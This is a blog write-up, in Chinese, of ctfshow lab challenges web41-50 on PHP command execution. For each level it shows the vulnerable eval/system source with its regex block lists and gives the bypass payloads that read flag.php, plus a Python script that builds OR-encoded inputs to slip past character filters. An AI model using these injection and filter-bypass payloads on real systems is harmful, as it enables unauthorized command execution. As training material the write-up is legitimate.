ctfshow-web入门-命令执行 41-50


web41

这题卡了我好久,在此特别感谢傅师傅的指导

看题目源码

<?php

/*
# -*- coding: utf-8 -*-
# @Author: 羽
# @Date:   2020-09-05 20:31:22
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-05 22:40:07
# @email: 1341963450@qq.com
# @link: https://ctf.show

*/

if(isset($_POST['c'])){
    $c = $_POST['c'];
if(!preg_match('/[0-9]|[a-z]|\^|\+|\~|\$|\[|\]|\{|\}|\&|\-/i', $c)){
        eval("echo($c);");
    }
}else{
    highlight_file(__FILE__);
}
?>

可以看到过滤了非常多的东西,但是没有过滤(,),以及|,于是使用或运算绕过

下面上脚本

import re
import sys
import urllib.parse

import requests

with open('web或运算绕过.txt','w') as a:
    for i in range(126):
        for j in range(126):
            k = i|j
            if k<=126 and k>=32:
                if re.search(r'[0-9]|[a-z]|\^|\+|\~|\$|\[|\]|\{|\}|\&|\-', chr(i)+chr(j), re.I) ==None:
                    b = chr(k)+' %'+'{0:02x}'.format(int(i))+' %'+'{0:02x}'.format(int(j))
                    a.write(b+'\n')
url = input("[+]请输入url:")
while 1:

    function = input('[+]:输入你的function:')
    begin ='("'
    end = '"'
    with open('web或运算绕过.txt','r') as a:
        c = a.readlines()
        for i in function:
            for b in c:
                # print(i)
                # print(b[0])
                if i==b[0]:
                    begin+=b[2:5]
                    end+=b[6:9]
                    break
    end+="\")"
    begin+='"'
    param = begin+'|'+end
    command = input("[+] 输入你的command:")
    begin ='("'
    end = '"'
    with open('web或运算绕过.txt','r') as a:
        c = a.readlines()
        for i in command:
            for b in c:
                # print(i)
                # print(b[0])
                if i==b[0]:
                    begin+=b[2:5]
                    end+=b[6:9]
                    break
    # print(begin)
    # print(end)
    end+="\")"
    begin+='"'
    param+= begin+'|'+end
    # print(param)

    data = {
        'c':urllib.parse.unquote(param)
    }
    # print(data)
    res = requests.post(url=url,data=data)
    print(res.text)

要点:1.可以使用(‘function’)(‘command’)在eval(“echo($c)”;);中输出命令

2.使用或运算可以绕过过滤的字符

3.带有回车的好像hackbar直接不行,要用其他办法,原因未知

web42

源码

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-05 20:51:55
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


if(isset($_GET['c'])){
    $c=$_GET['c'];
    system($c." >/dev/null 2>&1");
}else{
    highlight_file(__FILE__);
}

可以看到他把错误输出和标准输入都输出到黑洞里,所以看不到返回

解法一:

​ payload?c=cat flag.php%0a直接换行

解法二:

​ payload?c=cat flag.php;用分号隔开

web43

源码

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-05 21:32:51
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat/i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}

发现ban掉了;

于是使用&&或者||,&&就是当第一个命令执行成功以后再执行第二个命令,

所以解法一:

​ payload?c=tac *%26%26 注:一定记得url编码以后

解法二:

​ payload ?c=tac * %0a

​ payload ?c=nl * %0a

web44

源码

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-05 21:32:01
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/;|cat|flag/i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}

和上面大同小异

web45

源码

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-05 21:35:34
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat|flag| /i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}

过滤了空格

空格绕过小技巧 1、${IFS} 但不能写作 $IFS 2、$IFS$9 3 、%09 4、<

所以说两种解法大部分和上面一样

payload?c=tac%09*%0a

web46

源码

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-05 21:50:19
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*/i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}

看到多过滤了数字

不影响

与上面一样

payload?c=nl<fla''g.php%0a

web47

源码

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-05 21:59:23
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail/i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}

没啥变化,同上

web48-49

都一样

web50-51

源码

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-05 22:32:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`|\%|\x09|\x26/i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}

可以看到*和%09和%26都没了,但是可以用nl<命令和||来绕过,注:nl无法使用 *和?

于是payload?c=nl<fla''g.php%7C%7C


文章作者: Rolemee
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 Rolemee !
  目录